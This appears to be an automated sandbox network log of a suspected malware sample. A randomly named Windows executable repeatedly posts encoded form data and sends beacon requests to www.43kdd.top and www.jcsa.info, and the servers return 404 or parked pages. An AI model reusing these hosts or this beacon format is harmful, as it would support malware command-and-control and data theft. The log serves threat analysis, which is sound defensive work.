Nov 24, 2024 08:31:00.629570961 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 24 Nov 2024 07:31:00 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66df9b06-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	50013	38.47.232.202	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:31:01.862689018 CET	781	OUT	POST /p3j6/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 234 Connection: close Host: www.43kdd.top Origin: http://www.43kdd.top Referer: http://www.43kdd.top/p3j6/ User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Data Raw: 66 74 4d 44 77 3d 44 58 35 57 42 7a 37 50 69 38 6b 64 6a 56 75 64 52 6a 76 59 63 38 5a 45 69 75 79 6b 48 36 72 6b 55 6c 4e 61 55 34 4b 6c 68 68 33 71 35 38 59 7a 6c 57 76 45 36 32 56 4c 64 47 65 4c 36 75 4e 4b 62 36 75 4f 49 4c 2f 75 58 78 4c 41 36 66 77 58 38 56 76 4c 42 47 7a 65 61 44 4f 6c 6e 64 34 33 75 49 59 6e 43 4d 30 36 36 43 58 51 31 51 6a 4a 35 35 47 50 6e 71 61 72 51 79 63 39 4d 69 52 53 65 71 4a 4e 2b 69 79 65 78 4f 61 6b 67 69 49 6e 64 54 4e 56 7a 32 44 4b 57 4c 59 70 6a 34 57 7a 6a 2b 61 6f 56 50 39 77 59 58 34 4e 34 56 51 6d 57 38 74 43 33 33 4d 75 65 50 31 4f 42 36 35 54 76 55 79 62 4e 36 66 34 76 43 43 2b 50 2b 77 35 58 6d 32 76 70 42 51 45 57 72 75 58 66 39 63 31 4b 41 3d 3d Data Ascii: ftMDw=DX5WBz7Pi8kdjVudRjvYc8ZEiuykH6rkUlNaU4Klhh3q58YzlWvE62VLdGeL6uNKb6uOIL/uXxLA6fwX8VvLBGzeaDOlnd43uIYnCM066CXQ1QjJ55GPnqarQyc9MiRSeqJN+iyexOakgiIndTNVz2DKWLYpj4Wzj+aoVP9wYX4N4VQmW8tC33MueP1OB65TvUybN6f4vCC+P+w5Xm2vpBQEWruXf9c1KA==
Nov 24, 2024 08:31:03.338793039 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 24 Nov 2024 07:31:03 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66df9b06-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	50015	38.47.232.202	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:31:04.657820940 CET	1794	OUT	POST /p3j6/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1246 Connection: close Host: www.43kdd.top Origin: http://www.43kdd.top Referer: http://www.43kdd.top/p3j6/ User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Data Raw: 66 74 4d 44 77 3d 44 58 35 57 42 7a 37 50 69 38 6b 64 6a 56 75 64 52 6a 76 59 63 38 5a 45 69 75 79 6b 48 36 72 6b 55 6c 4e 61 55 34 4b 6c 68 68 50 71 35 76 51 7a 6b 31 33 45 39 32 56 4c 65 47 65 4b 36 75 4e 54 62 36 32 43 49 4d 33 55 58 7a 7a 41 37 38 6f 58 33 45 76 4c 50 47 7a 65 56 6a 4f 34 36 74 34 69 75 4a 6f 38 43 4d 45 36 36 43 58 51 31 57 50 4a 37 6f 47 50 30 61 61 6f 5a 53 63 4c 62 79 52 32 65 72 74 33 2b 69 47 4f 77 2b 36 6b 67 43 59 6e 4f 52 6c 56 73 47 44 45 62 72 5a 38 6a 35 71 73 6a 34 2b 6b 56 50 49 56 59 56 6b 4e 70 69 39 4b 47 2b 63 55 6a 55 59 57 4b 34 4a 7a 49 2b 6c 73 6c 55 79 59 44 4a 48 37 78 52 75 44 4c 4f 73 30 66 47 58 35 6f 7a 6b 71 58 37 2f 43 4a 4f 5a 42 64 46 50 43 42 6f 59 61 62 43 53 31 79 6d 54 7a 64 72 37 55 6d 50 6c 59 64 35 59 63 78 54 41 6d 65 79 37 67 45 41 54 44 50 48 30 52 43 38 61 5a 4d 59 56 55 49 46 72 37 62 54 75 38 4e 49 74 6a 54 42 37 57 4d 36 45 53 6f 35 55 54 34 74 63 63 77 68 39 39 38 64 55 6e 6b 77 30 52 52 65 58 52 59 41 79 70 2b 57 4d 4b 6d 6b 61 6c [TRUNCATED] Data Ascii: ftMDw=DX5WBz7Pi8kdjVudRjvYc8ZEiuykH6rkUlNaU4KlhhPq5vQzk13E92VLeGeK6uNTb62CIM3UXzzA78oX3EvLPGzeVjO46t4iuJo8CME66CXQ1WPJ7oGP0aaoZScLbyR2ert3+iGOw+6kgCYnORlVsGDEbrZ8j5qsj4+kVPIVYVkNpi9KG+cUjUYWK4JzI+lslUyYDJH7xRuDLOs0fGX5ozkqX7/CJOZBdFPCBoYabCS1ymTzdr7UmPlYd5YcxTAmey7gEATDPH0RC8aZMYVUIFr7bTu8NItjTB7WM6ESo5UT4tccwh998dUnkw0RReXRYAyp+WMKmkalb+ePGrMOO62IZHdI6dkqW07wreNYcQ/7hOhJwibRQqR7gHcTQ5KetPDunvfOhRc+qPtcYEFvE9rAhIjWDYEhsbDr6KcZIxbeYAskNPet6eLqAKowSXM4ZyDGzgjhIA00JAcqa2GSDYHoQmexvf2EHxu9O+kbdLJeT1uRmbmHqZEA4T+KxVB6yCjmfx7Sx40jp2Akslwj0G82q3D9C9EI6Xysae6VFvJgETXAQDeydU3Duv5AMdk/RtvCqO45Ym0TBjCEVV/l1RflDhrKEuDanzq6nPwYA1K7V3TWNhGgDBYu+kpsJgOQ98RE1fg9yh600FUTudfjirpPGh7Fxqh/EeediJknrUVu6IDx+pml7Ut2WDCq+PJkfQbHkBKlX38n/S+n2fpsntYesML+xkQClaEKHyxZLQJJ0jrwTAGikCauIWBUFQLfSIRo4vz9TXrZZoJV3DrmXBvsO+aObE8awyBXMV4k3ymasPcdaW4xlkcIGgslNLF6FU1j+E7CwbxoXmZPVlFpOtgyRM5kChdwYLLDJYw1e+BOU6OTp+8BzYAza8aj3aGfPzKkU25GY/AglAj4CQYWj9+IudRkQ0JS73SIKY6OlxyTP9e0BRMmxriFgbMpc3ffszgKnYbvHdbgvrYz4lgnWGEivA+GBt/m8zfkNRpOWIOCUG [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	50016	38.47.232.202	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:31:07.333631992 CET	512	OUT	GET /p3j6/?ftMDw=OVR2CF7p+NAClGW1MELAdr9D19OOCZyiV2x0cNqPuUjpn/Qhs1nMs1p1ZXuPw6NSEK+YKob7dwv93+8G93LPE2HhSCay4NYmxqdiK6FXxy6O+wbL+pa0tLSnaR0JMUJOZeRHums=&s8q=0RJLtN5PAfjxwlrp HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close Host: www.43kdd.top User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Nov 24, 2024 08:31:08.890268087 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 24 Nov 2024 07:31:08 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66df9b06-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	50017	208.91.197.39	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:31:14.815524101 CET	757	OUT	POST /hxi5/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 210 Connection: close Host: www.jcsa.info Origin: http://www.jcsa.info Referer: http://www.jcsa.info/hxi5/ User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Data Raw: 66 74 4d 44 77 3d 79 7a 6c 65 54 58 4c 68 5a 68 50 6f 78 74 6c 78 6b 34 30 52 66 2b 63 6b 4d 77 64 69 76 59 61 35 6a 77 55 48 70 6e 73 4b 33 52 53 62 72 37 64 46 74 74 47 69 37 65 70 36 44 58 6d 6b 37 4c 6b 5a 6a 6e 33 4c 55 70 49 58 69 52 41 38 4f 33 6b 6e 4e 31 65 53 42 66 78 78 6b 2f 34 2b 4f 41 64 75 56 6d 6e 59 73 33 52 7a 65 7a 6f 33 4a 67 46 61 39 57 74 75 6a 56 4d 78 6d 4c 56 73 63 2f 59 58 44 64 2f 57 55 50 41 44 6a 32 6a 47 76 30 6d 72 37 4d 6f 30 42 59 58 6d 2b 54 72 69 2b 61 4a 36 54 48 42 54 41 39 44 7a 6e 68 32 48 47 6f 66 46 58 48 42 50 47 4a 43 4f 45 5a 4a 68 45 43 57 79 62 37 74 31 47 6d 51 30 79 51 79 6c Data Ascii: ftMDw=yzleTXLhZhPoxtlxk40Rf+ckMwdivYa5jwUHpnsK3RSbr7dFttGi7ep6DXmk7LkZjn3LUpIXiRA8O3knN1eSBfxxk/4+OAduVmnYs3Rzezo3JgFa9WtujVMxmLVsc/YXDd/WUPADj2jGv0mr7Mo0BYXm+Tri+aJ6THBTA9Dznh2HGofFXHBPGJCOEZJhECWyb7t1GmQ0yQyl

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	50018	208.91.197.39	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:31:17.483016014 CET	781	OUT	POST /hxi5/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 234 Connection: close Host: www.jcsa.info Origin: http://www.jcsa.info Referer: http://www.jcsa.info/hxi5/ User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Data Raw: 66 74 4d 44 77 3d 79 7a 6c 65 54 58 4c 68 5a 68 50 6f 78 4e 31 78 6f 37 73 52 49 4f 63 6e 51 67 64 69 34 49 61 6c 6a 77 59 48 70 6d 5a 58 30 69 6d 62 72 5a 31 46 73 73 47 69 75 65 70 36 4c 33 6e 75 6d 62 6b 6f 6a 6d 4b 32 55 70 30 58 69 52 55 38 4f 31 73 6e 4d 43 4b 54 42 50 78 7a 2f 50 34 38 41 67 64 75 56 6d 6e 59 73 33 46 56 65 31 41 33 4a 51 56 61 37 7a 52 74 2f 6c 4d 79 79 62 56 73 4e 76 59 54 44 64 2f 77 55 4d 45 74 6a 30 62 47 76 78 61 72 31 39 6f 31 57 49 57 74 7a 7a 71 2b 7a 5a 59 70 5a 78 63 57 46 50 48 32 36 6a 69 48 44 65 43 66 4c 30 42 73 55 5a 69 4d 45 62 52 54 45 69 57 59 5a 37 56 31 55 78 63 54 39 6b 58 47 31 75 68 63 4f 52 62 48 49 39 47 4e 6e 76 6c 58 41 4c 57 6f 45 77 3d 3d Data Ascii: ftMDw=yzleTXLhZhPoxN1xo7sRIOcnQgdi4IaljwYHpmZX0imbrZ1FssGiuep6L3numbkojmK2Up0XiRU8O1snMCKTBPxz/P48AgduVmnYs3FVe1A3JQVa7zRt/lMyybVsNvYTDd/wUMEtj0bGvxar19o1WIWtzzq+zZYpZxcWFPH26jiHDeCfL0BsUZiMEbRTEiWYZ7V1UxcT9kXG1uhcORbHI9GNnvlXALWoEw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	50019	208.91.197.39	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:31:20.256548882 CET	1794	OUT	POST /hxi5/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1246 Connection: close Host: www.jcsa.info Origin: http://www.jcsa.info Referer: http://www.jcsa.info/hxi5/ User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Data Raw: 66 74 4d 44 77 3d 79 7a 6c 65 54 58 4c 68 5a 68 50 6f 78 4e 31 78 6f 37 73 52 49 4f 63 6e 51 67 64 69 34 49 61 6c 6a 77 59 48 70 6d 5a 58 30 6a 65 62 71 6f 56 46 73 4c 71 69 6f 75 70 36 46 58 6e 74 6d 62 6b 50 6a 6d 53 79 55 70 34 68 69 54 73 38 4f 51 67 6e 46 54 4b 54 4b 50 78 7a 33 76 34 2f 4f 41 64 42 56 6c 50 63 73 33 56 56 65 31 41 33 4a 57 5a 61 38 6d 74 74 73 31 4d 78 6d 4c 56 4a 63 2f 59 76 44 64 6e 4f 55 4e 77 54 69 41 76 47 76 52 71 72 33 50 77 31 4a 34 57 76 77 7a 71 32 7a 5a 56 78 5a 31 38 77 46 4f 6a 51 36 6a 47 48 42 5a 54 62 61 41 42 37 48 34 58 76 5a 72 52 66 45 79 61 37 58 37 5a 73 64 7a 51 6d 79 41 48 46 7a 34 35 52 4e 77 54 46 4f 4f 47 46 68 59 77 33 47 35 4c 36 65 56 36 70 68 4e 77 45 51 38 41 52 2b 63 78 6c 45 76 4e 77 48 61 47 5a 5a 4d 47 43 53 57 77 6a 33 67 39 61 41 41 52 48 4a 31 6b 33 49 32 30 37 34 58 4d 6f 43 42 53 47 76 51 57 35 4f 67 65 30 67 52 63 67 4d 77 45 4f 55 67 57 6b 48 6c 79 42 64 37 51 62 46 71 55 66 38 6b 70 37 71 4c 5a 5a 76 79 31 58 6f 67 33 6f 4a 6b 56 79 [TRUNCATED] Data Ascii: ftMDw=yzleTXLhZhPoxN1xo7sRIOcnQgdi4IaljwYHpmZX0jebqoVFsLqioup6FXntmbkPjmSyUp4hiTs8OQgnFTKTKPxz3v4/OAdBVlPcs3VVe1A3JWZa8mtts1MxmLVJc/YvDdnOUNwTiAvGvRqr3Pw1J4Wvwzq2zZVxZ18wFOjQ6jGHBZTbaAB7H4XvZrRfEya7X7ZsdzQmyAHFz45RNwTFOOGFhYw3G5L6eV6phNwEQ8AR+cxlEvNwHaGZZMGCSWwj3g9aAARHJ1k3I2074XMoCBSGvQW5Oge0gRcgMwEOUgWkHlyBd7QbFqUf8kp7qLZZvy1Xog3oJkVyDJ6ka+YjIf1LOB5Drd+1CQr1Td7rz3k/6JVARYuHyTXUyG4RY2F2lQnBrh9T4y3311kn4PU04LOWW2xGyeL1DGhPN1sLvZH6j3CgEME7KwojukdqAEEILpcQaqJx4PZoE82+ytOhCkp/2TtzCwyBcQ+V5JDMwf9KBFD4K4MCr14Np17O6YrQONYHMevYzN1CRFUKikhx1Yy7ikqSpI0pmbttcXns1nbLT64y2dYA+4X09xKf7oRFSP3WtgGqWgb2HQOZOrMJmIC/vwbZOYQV60WMw/SVw4Y4og5gELojUkPjAkB1FmXAkj2V2vr+2BCa2nuUw2XaLmb+zg+n+hH7Tp6ib84U4OqUDzSBdeegx6fYDGT5eVKuwQWuE83RzpHRfcjMOf8fCxWq/CVxvHz6ZWNcFAWg70Y/ukH2g2gWxEzzVRv1PoE0a2RloatVK3SQtrc/W3bhPPC7f+q7xCaxilch5lgf2O2FuNCTCCh9G5d1bVcAwbakLc5uHpwT5YLE4BNwbx91Q10579aLR15MASHcOaKkxZUf4+JFJkSIekqeoZMFrFZ/tGEEv1oZJbIUC3st2MQV29XEs1NK2ltuPDA6cEQ3+Ge+EUtkUCj9/6qb+U4uJvu9YD2EAlJbsE92r+AsMKdzei7WkgIcqk1mXt9DRBbnbMZ6TE [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	50020	208.91.197.39	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:31:22.947807074 CET	512	OUT	GET /hxi5/?ftMDw=/xN+QifpSgLb8oJZvOcEecwEXTNjyqH/ixYmgFld7FWiq7hEgfqLv6xcCSKy7O4D9GLUZYEuvgkAAG4+HQzEMugr7cJJcxtzNX7Y0CkoSUd8KQdmwlNemHcmzIVDdoEsc/fDA6w=&s8q=0RJLtN5PAfjxwlrp HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close Host: www.jcsa.info User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Nov 24, 2024 08:31:24.777152061 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 24 Nov 2024 07:31:23 GMT Server: Apache Referrer-Policy: no-referrer-when-downgrade Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com") Set-Cookie: vsid=910vr4799790841112632; expires=Fri, 23-Nov-2029 07:31:24 GMT; Max-Age=157680000; path=/; domain=www.jcsa.info; HttpOnly Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Connection: close Data Raw: 33 66 36 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44 46 45 54 58 52 6e 30 48 72 30 35 66 55 50 37 45 4a 54 37 37 78 59 6e 50 6d 52 62 70 4d 79 34 76 6b 38 4b 59 69 48 6e 6b 4e 70 65 64 6e 6a 4f 41 4e 4a 63 61 58 44 58 63 4b 51 4a 4e 30 6e 58 4b 5a 4a 4c 37 54 63 69 4a 44 38 41 6f 48 58 4b 31 35 38 43 41 77 45 41 41 51 3d 3d 5f 48 62 54 59 55 2b 45 73 55 5a 32 78 61 54 45 78 59 57 49 36 4c 79 48 6b 66 6c 6c 37 39 49 56 68 44 63 6b 76 71 75 48 34 2f 6f 58 4b 72 53 5a 71 58 4a 4b 6a 73 2f 7a 31 6a 2f 67 4e 6a 2b 44 64 67 38 36 59 53 42 69 43 50 74 6a 6a 53 65 46 6e 47 2f 4e 30 4b 77 3d 3d 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 [TRUNCATED] Data Ascii: 3f60<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_HbTYU+EsUZ2xaTExYWI6LyHkfll79IVhDckvquH4/oXKrSZqXJKjs/z1j/gNj+Ddg86YSBiCPtjjSeFnG/N0Kw==" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"/
Nov 24, 2024 08:31:24.777232885 CET	1236	IN	Data Raw: 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 6a 63 73 61 2e 69 6e 66 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 2e 61 73 73 65 74 5f 73 74 61 72 30 20 7b 0a 09 62 61 63 6b 67 72 6f 75 Data Ascii: > <title>jcsa.info</title> <style media="screen">.asset_star0 {background: url('//d38psrni17bvxu.cloudfront.net/themes/assets/star0.gif') no-repeat center;width: 13px;height: 12px;display: inline-block;}.asset_star1 {back
Nov 24, 2024 08:31:24.777288914 CET	1236	IN	Data Raw: 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 0a 7d 0a 0a 2e 68 65 61 64 65 72 2d 74 65 78 74 2d Data Ascii: overflow:hidden;}h1 { color:#848484; font-size:1.5rem;}.header-text-color:visited,.header-text-color:link,.header-text-color { color:#848484;}.comp-is-parked { margin: 4px 0 2px;}.comp-sponsored { text-align: left
Nov 24, 2024 08:31:24.777324915 CET	1236	IN	Data Raw: 2d 73 70 6f 6e 73 6f 72 65 64 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 77 72 61 70 70 65 72 31 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 31 35 30 30 70 78 Data Ascii: -sponsored { margin-left: 0; } .wrapper1 { max-width:1500px; margin-left:auto; margin-right:auto; } .wrapper2 { background:url('//d38psrni17bvxu.cloudfront.net/themes/cleanPeppermintBlack
Nov 24, 2024 08:31:24.777359009 CET	548	IN	Data Raw: 42 6d 61 57 78 73 50 53 4a 75 62 32 35 6c 49 69 38 2b 50 48 42 68 64 47 67 67 5a 44 30 69 54 54 55 75 4f 44 67 67 4e 43 34 78 4d 6b 77 78 4d 79 34 33 4e 69 41 78 4d 6d 77 74 4e 79 34 34 4f 43 41 33 4c 6a 67 34 54 44 67 67 4d 6a 4a 73 4d 54 41 74 Data Ascii: BmaWxsPSJub25lIi8+PHBhdGggZD0iTTUuODggNC4xMkwxMy43NiAxMmwtNy44OCA3Ljg4TDggMjJsMTAtMTBMOCAyeiIvPjwvc3ZnPg==');}</style> </head><body id="afd"><div class="wrapper1"> <div class="wrapper2"> <div class="wrapper3">
Nov 24, 2024 08:31:24.822173119 CET	1236	IN	Data Raw: 65 78 74 2d 63 6f 6c 6f 72 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 67 69 73 74 65 72 2e 63 6f 6d 2f 3f 74 72 6b 49 44 3d 57 53 54 6d 33 75 31 35 43 57 22 3e 6a 63 73 61 2e Data Ascii: ext-color" target="_blank" href="https://www.register.com/?trkID=WSTm3u15CW">jcsa.info is COMING SOON to REGISTER.COM</a> </span> </div> <div style="grid-column: 1 / span 3; justify-self: center; align-self: center"> <d
Nov 24, 2024 08:31:24.822354078 CET	1236	IN	Data Raw: 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0a 20 20 20 20 76 61 72 20 74 63 62 6c 6f 63 Data Ascii: /div></div><script type="text/javascript" language="JavaScript"> var tcblock = { // Required and steady 'container': 'tc', 'type': 'relatedsearch', 'colorBackground': 'transparent', 'numb
Nov 24, 2024 08:31:24.822391033 CET	1236	IN	Data Raw: 4e 57 56 6c 4d 57 51 78 59 57 45 30 59 32 4a 6b 4e 6d 5a 68 4d 44 52 6a 4d 47 49 36 4e 6a 63 30 4d 6d 51 32 4e 47 4d 33 4d 44 64 6c 4d 67 3d 3d 27 3b 20 20 20 20 20 20 20 20 20 6c 65 74 20 73 65 61 72 63 68 3d 27 27 3b 20 20 20 20 20 20 20 20 20 Data Ascii: NWVlMWQxYWE0Y2JkNmZhMDRjMGI6Njc0MmQ2NGM3MDdlMg=='; let search=''; let themedata='fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTEsYnVja2V0MDg4LGJ1Y2tldDA4OXx8fHx8fDY3NDJkNjRjNzA3NjJ8fHwxNzMyNDMzNDg0LjUzfDc0NjAyOWYzYjQ4NDY0NT
